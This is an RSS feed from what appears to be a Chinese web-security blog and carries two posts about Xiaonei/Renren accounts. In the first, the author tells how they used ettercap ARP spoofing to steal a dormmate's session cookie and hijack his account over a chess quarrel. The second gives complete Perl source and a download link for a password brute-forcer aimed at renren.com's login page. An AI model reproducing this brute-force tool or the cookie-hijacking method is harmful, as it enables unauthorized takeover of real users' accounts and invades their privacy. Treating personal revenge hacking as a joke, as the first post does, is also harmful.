<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>0x50sec.org &#187; 校内网</title>
	<atom:link href="http://www.0x50sec.org/tag/%e6%a0%a1%e5%86%85%e7%bd%91/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.0x50sec.org</link>
	<description>Focus on web security!</description>
	<lastBuildDate>Fri, 13 Jan 2012 09:23:52 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>交换机环境下利用ettercap盗取cookie劫持校内网认证会话</title>
		<link>http://www.0x50sec.org/%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e5%88%a9%e7%94%a8ettercap%e7%9b%97%e5%8f%96cookie%e5%8a%ab%e6%8c%81%e6%a0%a1%e5%86%85%e7%bd%91%e8%ae%a4%e8%af%81%e4%bc%9a%e8%af%9d/</link>
		<comments>http://www.0x50sec.org/%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e5%88%a9%e7%94%a8ettercap%e7%9b%97%e5%8f%96cookie%e5%8a%ab%e6%8c%81%e6%a0%a1%e5%86%85%e7%bd%91%e8%ae%a4%e8%af%81%e4%bc%9a%e8%af%9d/#comments</comments>
		<pubDate>Mon, 24 May 2010 03:23:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[cookie]]></category>
		<category><![CDATA[Ettercap]]></category>
		<category><![CDATA[校内网]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=890</guid>
		<description><![CDATA[昨天跟某舍友下象棋，说谁输了就买雪糕给对方吃。 男子汉大豆腐，焉能言而无信，谁料在我将死对方后，对方居然真的使用了绝技，死不认帐，耍赖皮。 俺只好将其行公布于校内网，结果连我们导师都鄙视那种行为，并鼓励我用板砖拍他。其他围观者也是无不愤然谴责之。谁料这厮利用舆论机器，在校内网颠倒是非、指鹿为马。偶只好进入其校内网，断其话语权，还事实真想于大众。 本来那厮用的网页登录很容易搞到其密码，谁知最近用了个校内网客户端，从那里进入网页，也就不用登录了。这下好，搞不到密码就搞他的cookie吧，反正一样。 ettercap出场，贴图 利用ettercap进行对目标arp欺骗以及嗅探找到目标跟校内网的tcp连接 查看会话校信息找到cookie 利用tamper data修改cookie成功登录校内网，还原事实真想并修改其头像恶搞一下]]></description>
			<content:encoded><![CDATA[<p>昨天跟某舍友下象棋，说谁输了就买雪糕给对方吃。</p>
<p>男子汉大豆腐，焉能言而无信，谁料在我将死对方后，对方居然真的使用了绝技，死不认帐，耍赖皮。</p>
<p>俺只好将其行公布于校内网，结果连我们导师都鄙视那种行为，并鼓励我用板砖拍他。其他围观者也是无不愤然谴责之。谁料这厮利用舆论机器，在校内网颠倒是非、指鹿为马。偶只好进入其校内网，断其话语权，还事实真想于大众。</p>
<p>本来那厮用的网页登录很容易搞到其密码，谁知最近用了个校内网客户端，从那里进入网页，也就不用登录了。这下好，搞不到密码就搞他的cookie吧，反正一样。</p>
<p>ettercap出场，贴图</p>
<p><span id="more-890"></span><a href="http://www.0x50sec.org/wp-content/uploads/2010/05/1.png"><img class="aligncenter size-medium wp-image-891" title="1" src="http://www.0x50sec.org/wp-content/uploads/2010/05/1-300x230.png" alt="" width="300" height="230" /></a></p>
<p style="text-align: center;">利用ettercap进行对目标arp欺骗以及嗅探<a href="http://www.0x50sec.org/wp-content/uploads/2010/05/2.png"><img class="aligncenter size-medium wp-image-892" title="2" src="http://www.0x50sec.org/wp-content/uploads/2010/05/2-300x230.png" alt="" width="300" height="230" /></a>找到目标跟校内网的tcp连接<a href="http://www.0x50sec.org/wp-content/uploads/2010/05/3.png"><img class="aligncenter size-medium wp-image-893" title="3" src="http://www.0x50sec.org/wp-content/uploads/2010/05/3-300x230.png" alt="" width="300" height="230" /></a></p>
<p style="text-align: center;">查看会话校信息找到cookie</p>
<p style="text-align: center;"><img class="aligncenter size-medium wp-image-894" title="23" src="http://www.0x50sec.org/wp-content/uploads/2010/05/23-294x300.png" alt="" width="294" height="300" /></p>
<p style="text-align: center;">利用tamper data修改cookie成功登录校内网，还原事实真想并修改其头像恶搞一下</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e5%88%a9%e7%94%a8ettercap%e7%9b%97%e5%8f%96cookie%e5%8a%ab%e6%8c%81%e6%a0%a1%e5%86%85%e7%bd%91%e8%ae%a4%e8%af%81%e4%bc%9a%e8%af%9d/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>一个简单的校内网、人人网帐号暴力破解工具（Perl）</title>
		<link>http://www.0x50sec.org/%e4%b8%80%e4%b8%aa%e7%ae%80%e5%8d%95%e7%9a%84%e6%a0%a1%e5%86%85%e7%bd%91%e3%80%81%e4%ba%ba%e4%ba%ba%e7%bd%91%e5%b8%90%e5%8f%b7%e6%9a%b4%e5%8a%9b%e7%a0%b4%e8%a7%a3%e5%b7%a5%e5%85%b7-perl/</link>
		<comments>http://www.0x50sec.org/%e4%b8%80%e4%b8%aa%e7%ae%80%e5%8d%95%e7%9a%84%e6%a0%a1%e5%86%85%e7%bd%91%e3%80%81%e4%ba%ba%e4%ba%ba%e7%bd%91%e5%b8%90%e5%8f%b7%e6%9a%b4%e5%8a%9b%e7%a0%b4%e8%a7%a3%e5%b7%a5%e5%85%b7-perl/#comments</comments>
		<pubDate>Wed, 03 Mar 2010 03:07:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[工具代码]]></category>
		<category><![CDATA[人人网]]></category>
		<category><![CDATA[暴力破解]]></category>
		<category><![CDATA[校内网]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=111</guid>
		<description><![CDATA[一个简单的校内网、人人网帐号暴力破解工具（Perl） 单线程、支持HTTP代理。 windows用户一般需要安装active perl等perl解析程序。 然后用老婆的账号测试了一下，因为我知道老婆的所有信息，让然我也知道老婆的密码，这里仅仅是测试一下。不一会就跑出了人人网账号的密码。 当然需要事先知道账号的邮箱地址才能破解。 此程序仅供学习研究之用，严禁用于侵犯别人隐私的行为。 #!/usr/bin/perl # detectxn.pl # Brute force for xiaonei.com、renren.com # By 0x50sec.org Just for fun # If you wanna to detect sombody's account ,please use Dansnow... #Thanks google.com,milw0rm.com,xfocus.net... use POSIX; use LWP::UserAgent; sub isproxy { my $t=0; foreach (@ARGV) { if ($ARGV[$t] eq &#8220;&#8211;proxy&#8221;){$proxy = $ARGV[$t+1]} $t++; } } [...]]]></description>
			<content:encoded><![CDATA[<p>一个简单的校内网、人人网帐号暴力破解工具（Perl）<br />
单线程、支持HTTP代理。</p>
<p>windows用户一般需要安装active perl等perl解析程序。</p>
<p>然后用老婆的账号测试了一下，因为我知道老婆的所有信息，让然我也知道老婆的密码，这里仅仅是测试一下。不一会就跑出了人人网账号的密码。</p>
<p>当然需要事先知道账号的邮箱地址才能破解。</p>
<p>此程序仅供学习研究之用，严禁用于侵犯别人隐私的行为。</p>
<p><code><br />
#!/usr/bin/perl<br />
# detectxn.pl<br />
# Brute force for xiaonei.com、renren.com<br />
# By 0x50sec.org Just for fun<br />
# If you wanna to detect sombody's account ,please use Dansnow...<br />
#Thanks google.com,milw0rm.com,xfocus.net...<br />
use POSIX;<br />
use LWP::UserAgent;</code></p>
<p><span id="more-111"></span></p>
<p>sub isproxy<br />
{<br />
my $t=0;<br />
foreach (@ARGV)<br />
{<br />
if ($ARGV[$t] eq &#8220;&#8211;proxy&#8221;){$proxy = $ARGV[$t+1]}<br />
$t++;<br />
}<br />
}</p>
<p>sub Usage<br />
{<br />
print(&#8220;\n&#8221;);<br />
print(&#8220;[+] Usage: $0 \n&#8221;);<br />
print(&#8220;[+] Coded by hackerxwar\n&#8221;);<br />
print(&#8220;\n&#8221;);<br />
}</p>
<p>sub try_login<br />
{<br />
my ($user, $passdic) = @_;<br />
my $okflag = 0;<br />
my $lwp = new LWP::UserAgent or die;<br />
$lwp-&gt;agent(&#8216;Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6)&#8217;);<br />
$lwp-&gt;proxy(&#8220;http&#8221;, &#8220;http://$proxy/&#8221;) if defined($proxy);<br />
open(FH,&#8221;&lt;$passdic&#8221;);<br />
while() #readdicfile<br />
{<br />
chomp;<br />
my $pwd=$_;<br />
printf(&#8220;Now try &#8230;&#8221;.$user.&#8221;~~~~&#8221;.$pwd);<br />
my $res = $lwp-&gt;post( $target,<br />
['email' =&gt; $user,<br />
'password' =&gt; $pwd,<br />
'origURL' =&gt; "/home.do?from=8000103",<br />
]<br />
);<br />
my $myres=$res-&gt;content; #for test<br />
#printf($myres) ; #for test<br />
#print &#8220;$res-&gt;status_line&#8221;;<br />
#if($myres=~/http:\/\/login.renren.com\/callback.do/)<br />
#To judge if the login is sucess<br />
if($res-&gt;status_line =~ /^302/)<br />
{<br />
$okflag = 1;<br />
printf(&#8220;\n++++++++++++++++++++++++++++++++++++++++++++++++++++\n&#8221;);<br />
print(&#8220;\n[+]&#8220;.$res-&gt;status_line.&#8221;\tlogin OK with : $user~~~~$pwd \n&#8221;);<br />
printf(&#8220;\n++++++++++++++++++++++++++++++++++++++++++++++++++++\n&#8221;);<br />
last;<br />
}<br />
else<br />
{<br />
printf(&#8220;\t[-]&#8220;.$res-&gt;status_line.&#8221;\tlogin failed!\n&#8221;);<br />
}<br />
}<br />
close(FH);<br />
if($okflag == 0)<br />
{<br />
printf(&#8220;\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;\n&#8221;);<br />
printf(&#8220;[-]login failed with $user and dicfile $passdic&#8230;&#8221;);<br />
printf(&#8220;\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;\n&#8221;);<br />
}<br />
return 1;<br />
}</p>
<p>if(@ARGV &lt; 2)<br />
{<br />
Usage();<br />
exit;<br />
}<br />
isproxy();<br />
print (&#8220;Use proxy: &#8220;.$proxy.&#8221;\n&#8221;) if defined($proxy);<br />
$target =&#8221;http://m.renren.com/login.do&#8221;;<br />
$user=$ARGV[0];<br />
$passdic=$ARGV[1];<br />
Usage();<br />
try_login($user,$passdic) or die &#8220;[-] login failed with $user and dic:$passdic\n&#8221;;</p>
<p>下载地址:<a href="http://www.0x50sec.org/wp-content/uploads/2010/03/cxn.pl_.tar.gz">cxn.pl.tar</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e4%b8%80%e4%b8%aa%e7%ae%80%e5%8d%95%e7%9a%84%e6%a0%a1%e5%86%85%e7%bd%91%e3%80%81%e4%ba%ba%e4%ba%ba%e7%bd%91%e5%b8%90%e5%8f%b7%e6%9a%b4%e5%8a%9b%e7%a0%b4%e8%a7%a3%e5%b7%a5%e5%85%b7-perl/feed/</wfw:commentRss>
		<slash:comments>49</slash:comments>
		</item>
	</channel>
</rss>

